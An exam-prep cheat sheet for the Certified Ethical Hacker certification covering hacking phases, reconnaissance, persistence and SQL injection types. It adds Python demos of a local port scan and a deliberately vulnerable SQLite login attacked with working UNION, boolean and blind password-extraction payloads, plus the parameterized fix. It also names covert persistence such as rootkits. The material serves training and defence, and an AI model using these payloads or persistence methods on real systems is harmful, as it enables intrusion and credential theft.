Certified Ethical Hacker Cheat Sheet

CEH Tests Ethical Hacking Methodology and Tool Selection — Not Just Attack Knowledge

CEH tests whether you can execute a structured penetration testing process — reconnaissance, scanning, gaining access, maintaining access, and covering tracks — in the right sequence.

Difficulty: among the harder certs · Avg: approximately 62–67% · Passing: EC-Council does not use a fixed 750/1000 score; each exam form has its own cut score, which EC-Council states can range from roughly 60% to 85%.
Most candidates understand Certified Ethical Hacker concepts and still fail. This exam tests how you apply knowledge under pressure.

CEH Hacking Methodology (5 Phases)

CEH covers 20 modules across ethical hacking phases, system hacking, malware threats, social engineering, web application hacking, and cryptography. The exam tests both knowledge of attack techniques and the appropriate countermeasures.

  1. Reconnaissance — Passive (OSINT) and active information gathering
  2. Scanning — Network scanning, vulnerability scanning, enumeration
  3. Gaining Access — Exploitation of identified vulnerabilities
  4. Maintaining Access — Backdoors, rootkits, persistence mechanisms
  5. Covering Tracks — Log manipulation, artifact removal

Wrong instinct vs correct approach

A pen tester needs to gather information about a target without being detected
✕ Wrong instinct

Conduct an Nmap scan to identify open ports and services

✓ Correct approach

Nmap is active reconnaissance: it sends packets to the target, and every open port it touches can log the probe. Start with passive OSINT (WHOIS, DNS records, LinkedIn, Google dorking) before any active scanning to remain undetected and avoid triggering IDS alerts. (Queries sent to the target's own authoritative nameservers do reach its infrastructure, but CEH material still classifies DNS footprinting as passive.)

A web application is vulnerable to SQL injection
✕ Wrong instinct

Use SQLmap to automate the entire exploitation

✓ Correct approach

CEH methodology calls for manual testing and an understanding of the vulnerability before reaching for automated tools: identify the injection point, confirm it by hand (a lone quote for errors, a UNION with matching column count, a true/false condition pair for blind cases), then use tools such as SQLmap to extend the scope. Automated exploitation without understanding is not ethical hacking methodology.

A system has been compromised and the tester needs to maintain access
✕ Wrong instinct

Install a visible backdoor for easy re-entry

✓ Correct approach

Use covert persistence mechanisms (scheduled tasks, registry run keys, rootkits) that are less likely to be detected, but only those the written authorization and rules of engagement permit; document each one and remove it during cleanup. In a real engagement a rootkit on a production system is rarely within scope, even when it is the "textbook" answer.

Know these cold

  • Always get written authorization before any active testing; without it, the activity is unauthorized access and illegal
  • Reconnaissance first: passive before active, to minimize detection risk
  • Nmap = port/service scan; Nessus = vulnerability scan; Metasploit = exploitation framework
  • SQL injection: always test manually first before running automated tools
  • CEH tests countermeasures equally with attack techniques — study both sides
  • Footprinting, scanning, enumeration, exploitation — do not skip phases
  • Social engineering attacks target people, not technology — training is the primary countermeasure

Can you answer these without checking your notes?

In this scenario: "A pen tester needs to gather information about a target without being detected" — what should you do first?
Passive OSINT (WHOIS, DNS records, LinkedIn, Google dorking). Nmap is active reconnaissance and can trigger IDS alerts, so it comes later.
In this scenario: "A web application is vulnerable to SQL injection" — what should you do first?
Identify the injection point and confirm it manually; only then use SQLmap or similar tools to extend the scope.
In this scenario: "A system has been compromised and the tester needs to maintain access" — what should you do first?
Check the written authorization, then use covert persistence (scheduled tasks, registry run keys, rootkits where permitted) rather than a visible backdoor, and document it for cleanup.

Common Exam Mistakes — What candidates get wrong

Skipping reconnaissance phase in scenario questions

The CEH methodology always starts with reconnaissance — both passive (OSINT, DNS lookup, Google hacking) and active (ping sweep, port scan). Candidates who jump to exploitation without completing the information gathering phase answer scenario questions incorrectly.

Confusing active vs. passive reconnaissance

Passive reconnaissance does not interact with the target system (WHOIS, DNS records, social media). Active reconnaissance does interact with the target (port scanning, ping sweeps). Because active reconnaissance touches the target's systems it requires explicit authorization, while passive reconnaissance draws only on public sources; in a real engagement it should still stay within the agreed scope. Mixing these up in legal/ethical questions is a critical error.
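Added example (not code from the cheat sheet or from EC-Council) showing concretely why the first scenario above and this mistake matter: a passive step that parses a public WHOIS record sends nothing to the target, while a TCP connect scan, the kind Nmap performs by default without raw-socket privileges, completes a handshake on every open port and is logged by the target. Everything runs against a throwaway listener on 127.0.0.1; the WHOIS text is constructed, and the listener, the alert format and the `run_demo` helper are assumptions for the demonstration.

```python
import socket
import threading
import time
from typing import Dict, List

TARGET = "127.0.0.1"   # throwaway target: a listener in this same process

# Constructed WHOIS text for the demonstration (shaped like a real record).
WHOIS_SAMPLE = """\
Domain Name: EXAMPLE.COM
Registrar: Example Registrar, LLC
Name Server: A.IANA-SERVERS.NET
Name Server: B.IANA-SERVERS.NET
Registrant Email: hostmaster@example.com
"""


def passive_whois_summary(whois_text: str) -> Dict[str, List[str]]:
    """Passive OSINT: the record comes from a public registry, so nothing is
    sent to the target. Collect every 'Key: value' line under its key."""
    summary: Dict[str, List[str]] = {}
    for line in whois_text.splitlines():
        key, sep, value = line.partition(":")
        if sep:
            summary.setdefault(key.strip().lower(), []).append(value.strip())
    return summary


class LoggingTarget:
    """The target's side: listening ports that record every inbound
    connection, the way a host firewall or IDS would."""

    def __init__(self, count: int) -> None:
        self.alerts: List[str] = []
        self.open_ports: List[int] = []
        self._lock = threading.Lock()
        self._servers: List[socket.socket] = []
        for _ in range(count):
            srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            srv.bind((TARGET, 0))            # port 0: the OS picks a free port
            srv.listen(8)
            self._servers.append(srv)
            self.open_ports.append(srv.getsockname()[1])
            threading.Thread(target=self._accept_loop, args=(srv,), daemon=True).start()

    def _accept_loop(self, srv: socket.socket) -> None:
        dst_port = srv.getsockname()[1]
        while True:
            try:
                conn, (src_ip, src_port) = srv.accept()
            except OSError:
                return                        # listener closed
            with self._lock:
                self.alerts.append(f"ALERT tcp {src_ip}:{src_port} -> {TARGET}:{dst_port} connect")
            conn.close()

    def close(self) -> None:
        for srv in self._servers:
            try:
                srv.shutdown(socket.SHUT_RDWR)  # wakes a blocked accept()
            except OSError:
                pass
            srv.close()


def find_closed_port() -> int:
    """Bind then release an ephemeral port so the scan has one known-closed port."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind((TARGET, 0))
        return s.getsockname()[1]


def connect_scan(host: str, ports: List[int], timeout: float = 0.5) -> Dict[int, str]:
    """Active reconnaissance: a TCP connect scan completes the three-way
    handshake on each port, so every open port sees (and can log) the probe."""
    results: Dict[int, str] = {}
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            results[port] = "open" if s.connect_ex((host, port)) == 0 else "closed"
    return results


def run_demo() -> Dict[str, object]:
    """Run both recon styles and return what the tester and the target each saw."""
    target = LoggingTarget(count=2)
    try:
        closed = find_closed_port()
        scan = connect_scan(TARGET, target.open_ports + [closed])
        deadline = time.time() + 2.0          # let the accept threads log
        while len(target.alerts) < len(target.open_ports) and time.time() < deadline:
            time.sleep(0.01)
        return {
            "whois": passive_whois_summary(WHOIS_SAMPLE),
            "scan": scan,
            "open_ports": list(target.open_ports),
            "closed_port": closed,
            "alerts": list(target.alerts),
        }
    finally:
        target.close()


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, value)
```

The WHOIS summary is built without a single packet to the target, while the scan result and the target's alert list line up one-to-one: each open port that the tester learns about is a log line the defender now has. The closed port never reaches `accept()`, which is also why a SYN-only scan is quieter on the application side but still visible to a firewall or IDS watching the network.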

Misidentifying scanning tool purposes

Nmap for port and service scanning; Nessus for vulnerability scanning; Wireshark for packet capture and analysis; Metasploit for exploitation. Candidates confuse scanning tools with exploitation tools in scenario questions.

Treating countermeasures as optional knowledge

CEH tests both attack techniques AND their countermeasures. Candidates who study only the offensive side miss 30-40% of questions about defensive controls, patching, and security hardening.

Confusing SQL injection types

In-band (error-based, union-based), inferential/blind (boolean-based, time-based), and out-of-band SQL injection have different detection and exploitation techniques. Candidates who only know generic SQL injection fail specific scenario questions.
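Added example (not from the cheat sheet) that walks the manual-first sequence from the SQL injection scenario above through the in-band and inferential types named here, against a deliberately vulnerable query on an in-memory SQLite database, followed by the parameterized countermeasure. The schema, the two sample users and the `login_*` functions are constructed for the demonstration; time-based and out-of-band variants are not shown because SQLite has no sleep or network functions.

```python
import sqlite3
import string
from typing import Dict, List, Tuple

CHARSET = string.ascii_letters + string.digits + string.punctuation


def make_db() -> sqlite3.Connection:
    """Constructed sample data; plaintext passwords only to keep the toy short."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT);
        INSERT INTO users(username, password, role) VALUES
            ('alice', 'S3cret!', 'admin'),
            ('bob',   'hunter2', 'user');
    """)
    return db


def login_vulnerable(db: sqlite3.Connection, username: str, password: str) -> List[Tuple]:
    """VULNERABLE on purpose: untrusted input is spliced into the SQL text."""
    sql = ("SELECT username, role FROM users "
           f"WHERE username = '{username}' AND password = '{password}'")
    return db.execute(sql).fetchall()


def login_fixed(db: sqlite3.Connection, username: str, password: str) -> List[Tuple]:
    """Countermeasure: bound parameters keep input out of the query grammar."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchall()


# --- Manual probes, in the order a tester would run them -------------------

def probe_error_based(db: sqlite3.Connection) -> str:
    """Step 1, detection: a lone quote breaks the grammar. A database error
    leaking back to the client is the classic in-band (error-based) signal."""
    try:
        login_vulnerable(db, "'", "x")
    except sqlite3.OperationalError as exc:
        return str(exc)
    return ""


def probe_union_based(db: sqlite3.Connection) -> List[Tuple]:
    """Step 2, in-band extraction: append a UNION with the same column count
    and comment out the rest of the original WHERE clause."""
    payload = "' UNION SELECT username, password FROM users --"
    return login_vulnerable(db, payload, "x")


def probe_boolean_blind(db: sqlite3.Connection) -> Tuple[bool, bool]:
    """Step 3, inferential/blind detection: the response (here, whether a row
    comes back) differs between a true and a false condition."""
    true_case = login_vulnerable(db, "alice' AND 1=1 --", "x")
    false_case = login_vulnerable(db, "alice' AND 1=2 --", "x")
    return bool(true_case), bool(false_case)


def blind_extract_password(db: sqlite3.Connection, username: str) -> Tuple[str, int]:
    """Boolean-based blind extraction, one character per oracle query.
    unicode(substr(...)) compares code points, so the payload needs no quotes.
    The column name 'password' is assumed known (enumerated earlier).
    Returns the recovered value and how many queries it took."""
    recovered, queries, pos = "", 0, 1
    while True:
        found = None
        for ch in CHARSET:
            queries += 1
            payload = f"{username}' AND unicode(substr(password,{pos},1))={ord(ch)} --"
            if login_vulnerable(db, payload, "x"):
                found = ch
                break
        if found is None:            # nothing matched: end of the string
            return recovered, queries
        recovered += found
        pos += 1


def run_demo() -> Dict[str, object]:
    db = make_db()
    password, queries = blind_extract_password(db, "alice")
    return {
        "error_message": probe_error_based(db),
        "union_rows": probe_union_based(db),
        "boolean_oracle": probe_boolean_blind(db),
        "blind_password": password,
        "blind_queries": queries,
        "fixed_login_ok": login_fixed(db, "alice", "S3cret!"),
        "fixed_login_injected": login_fixed(db, "' OR 1=1 --", "x"),
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, value)
```

The query count returned by `blind_extract_password` is the practical reason the exam distinguishes the types: a UNION pulls every row in one request, while a blind oracle needs dozens of requests per character, which is exactly where a tool such as SQLmap earns its place once the injection point has been confirmed by hand. Against `login_fixed` the same payloads are just strings that match no user.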

CEH tests hacking methodology, not just attack knowledge. Test whether you know the right sequence.